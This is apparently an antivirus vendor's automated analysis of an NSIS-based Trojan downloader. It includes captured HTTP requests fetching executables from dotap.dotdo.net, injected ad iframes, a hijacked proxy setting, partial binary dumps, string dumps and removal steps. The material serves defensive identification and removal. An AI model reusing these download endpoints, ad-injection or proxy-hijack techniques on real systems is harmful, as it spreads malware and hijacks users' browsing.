com/download_malwarebytes_anti_malware..majorgeeks.com/files/details/m
alwarebytes_anti_malware.html..VVV.majorgeeks.com/files/details/malwar
ebytes_anti_malware.html..VVV.microsoft.com/en-us/download/confirmatio
n.aspx?id=9905..microsoft.com/en-us/download/confirmation.aspx?id=9905
..ads.pubmatic.com/AdServer/js/showad.js..download.cnet.com/Comodo-Int
ernet-Security-Premium/3000-2239_4-10460704.html..filehippo.com/downlo
ad_comodo..VVV.filehippo.com/download_comodo..VVV.tomsguide.com/us/dow
nload/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..toms
guide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301
-6605.html..VVV.pcmag.com/article2/0,2817,2457135,00.asp..pcmag.com/ar
ticle2/0,2817,2457135,00.asp..ads.pubmatic.com/AdServer/js/showad.js..
b.scorecardresearch.com/beacon.js..d.gettvwizard.com/l/load.js..d.inst
ashareonline.com/l/load.js..apiboxrockinfo-a.akamaihd.net/gsrs?is=EF23
DDUS&bp=PB3&g=a636a08d-c0be-4314-b676-974f8a821dce..VVV.filehippo.com/
download_malwarebytes_anti_malware..filehippo.com/download_malwarebyte
s_anti_malware..VVV.filehippo.com/download_malwarebytes_anti_malware/5
9476..filehippo.com/download_malwarebytes_anti_malware/59476..origin.l
anguages.malwarebytes.org/downloads/..download.cnet.com/Malwarebytes-A
nti-Malware/3000-8022_4-10804572.html..tech-support-experts.com/cp<<< skipped >>>
GET /act/txt/vv.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:23 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html5cea..all;;;;;;;;;;;<div class="mapAndAttrs">;;;;;;;;;;;<div
class="mapAndAttrs"><iframe width="300" height="250" scrolling=n
o frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.do
tdo.net/adss/indexR.php?size=300x250 id="ddttttr"></iframe>..
all;;;;;;;;;;;<button class="reply_button js-only">;;;;;;;;;;;&l
t;br><iframe width="728" height="90" scrolling=no frameborder=0
scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/ind
exR.php?size=728x90 id="ddttttr"></iframe><br><butto
n class="reply_button js-only">..all;;;;;;;;;;;<header class="bc
head">;;;;;;;;;;;<br><iframe width="728" height="90" scrol
ling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://a
dss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe&
gt;<br><header class="bchead">..all;;;;;;;;;;;<ul class
="clfooter">;;;;;;;;;;;<br><iframe width="728" height="90"
scrolling=no frameborder=0 scrolling=no allowtransparency=true src=ht
tp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></i
frame><br><ul class="clfooter">..installpath.com;;;;;;;
;;;;<div style="margin:0 auto; width:320px; height:270px;">;;;;;
;;;;;;<iframe width="850" height="480" scrolling=no frameborder=0 s
crolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/inde
xRB.php?a=11 id="ddttttr"></iframe>..VVV.installpath.com;;;;;
;;;;;;<div style="margin:0 auto; width:320px; height:270px;"><<< skipped >>>
GET /act/exevc/vchk.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:23 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Wed, 19 Aug 2015 17:31:58 GMT
ETag: "16a000000026349-ddb0-51dad696a4296"
Accept-Ranges: bytes
Content-Length: 56752
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownloadMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....<<< skipped >>>
GET /ckkkp.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:28 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT
ETag: "100000000026c77-9f-508fdd8811aa8"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<title>Untitled</title>..<
/head>..<body>....<mamoba>..</body>..</html>
;..HTTP/1.1 200 OK..Date: Sat, 22 Aug 2015 11:00:28 GMT..Server: Apach
e/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Sat, 29 Nov 2014 11:40:35
GMT..ETag: "100000000026c77-9f-508fdd8811aa8"..Accept-Ranges: bytes..C
ontent-Length: 159..Keep-Alive: timeout=5, max=100..Connection: Keep-A
live..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD H
TML 4.01 Transitional//EN">..<html>..<head>..<title&
gt;Untitled</title>..</head>..<body>....<mamoba&g
t;..</body>..</html>....
GET /cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877 HTTP/1.1
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:55 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 11
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html...googgood..
GET /act/bdcount.ini?uniqueid=qPAyENSREpdiRdy4l7PC&type=1&reg=3215049.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:57 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html[a]..v=6....
GET /act/uniqueqPAyENSREpdiRdy4l7PC.ini?rd=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:58 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html[a]..v=yes....
GET /act/exesbununique/qPAyENSREpdiRdy4l7PC.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:58 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Tue, 26 May 2015 16:50:52 GMT
ETag: "100000000026a66-dfa3-516feede835a3;509b7b7bbf620"
Accept-Ranges: bytes
Content-Length: 57251
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/x-msdownloadMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\FindProcDLL.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\FindProcDLL.dll
.reloc
Kernel32.DLL
PSAPI.DLL
FindProcDLL.dll
System.dll
callback%d
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp
nsr6.tmp
C:\a\wincheckfe.exe
wincheckfe.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
qPAyENSREpdiRdy4l7PC.exe_752:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp\inetc.dll
ication Data\apqPAyENSREpdiRdy4l7PC.html
rome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp\inetc.dll
Override:<-loopback> || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
%Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html
A~loogg2.txt
pdiRdy4l7PC.html
PQPAY~1.HTM
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp\inetc.dll
tml/fide/lo2qPAyENSREpdiRdy4l7PC.txt
ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaB.tmp
1464376
winonit.exe
4l7PC.exe
1495012
C:\a\qPAyENSREpdiRdy4l7PC.exe
qPAyENSREpdiRdy4l7PC.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
http=127.0.0.1:8877;https=127.0.0.1:8877
C:\a\internetport3.exe
6.0.2900.5512
3215049.bat
dobeARM.exe"
wcheckf.exe
wincheckfe.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>ttps=127.0.0.1:8877
tport3.exe
\Adobe\ARM\1.0\AdobeARM.exe"
qPAyENSREpdiRdy4l7PC.exe_752_rwx_10004000_00001000:
callback%d
wcheckf.exe_1312:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Program Files%\Google\Chrome\Application\chrome.exe
e.exe
a\Google\Chrome\Application\chrome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp\FindProcDLL.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp
on\Internet Settings AutoConfigURL
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp\FindProcDLL.dll
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
!%[ %S
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp
nsd8.tmp
ogram Files\Google\Chrome\Application\chrome.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd8.tmp
C:\a\wcheckf.exe
wcheckf.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
wincheckfe.exe_1024_rwx_10004000_00001000:
callback%d
wcheckf.exe_1312_rwx_10004000_00001000:
callback%d
winonit.exe_1304:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuA.tmp\KillProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuA.tmp
.reloc
Kernel32.DLL
PSAPI.DLL
MSVCRT.dll
KillProcDLL.dll
u.Uj@
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
\.lR%
g.ZO||k[
C:\a\avv.txt
avv.txt
m\LOCALS~1\Temp\nsuA.tmp
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuA.tmp
C:\a\winonit.exe
winonit.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
getcap.exe_500:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\a\7za.exe
S~1\Temp\nsnE.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp\System.dll
C:\a\ukey.ini
7za.exe
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp\System.dll
GetCPInfo
MB, # %s =
RAM %s
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Can not open encrypted archive. Wrong password?
Unsupported archive type
-p{Password}: set Passwordis not supported archive
Enter password (will not be echoed):
Advapi32.dll
kernel32.dll
update operations are not supported for this archive
Mapi32.dll
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
OLEAUT32.dll
GetWindowsDirectoryW
E%SsK*X|
, .MN6b
1%uhx
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp
ukey.ini
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnE.tmp
C:\a\getcap.exe
getcap.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsnD.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>H7zCon.sfx
7-Zip cannot load Mapi32.dll
A* * .tar .tar
B* .tar
winonit.exe_1304_rwx_10004000_00001000:
callback%d
getcap.exe_500_rwx_10004000_00001000:
callback%d
vchk.exe_1968:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa10.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
C:\a\avchk.txt
avchk.txt
\LOCALS~1\Temp\nsa10.tmp
hk.txt
jamInternetEnhancerApp.exe
21f5f7.exe
"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani
vchk.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskF.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
WajamInternetEnhancerApp.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
vchk.exe_1968_rwx_10004000_00001000:
callback%d
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WMIC.exe:1768
%original file name%.exe:1588
taskkill.exe:1268
taskkill.exe:744
taskkill.exe:572
taskkill.exe:628
taskkill.exe:1200
taskkill.exe:1920
taskkill.exe:1924
taskkill.exe:232
taskkill.exe:1984
taskkill.exe:1776
taskkill.exe:1812
taskkill.exe:1192
taskkill.exe:1584
taskkill.exe:1252
taskkill.exe:1464
taskkill.exe:2016
taskkill.exe:1036
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:1216
taskkill.exe:672
taskkill.exe:1332
taskkill.exe:120
taskkill.exe:1932
taskkill.exe:228
taskkill.exe:388
taskkill.exe:1020
taskkill.exe:1432
taskkill.exe:1280
taskkill.exe:1728
taskkill.exe:1384
taskkill.exe:860
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:2020
taskkill.exe:1008
taskkill.exe:296
taskkill.exe:292
taskkill.exe:680
taskkill.exe:1416
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1418 bytes)
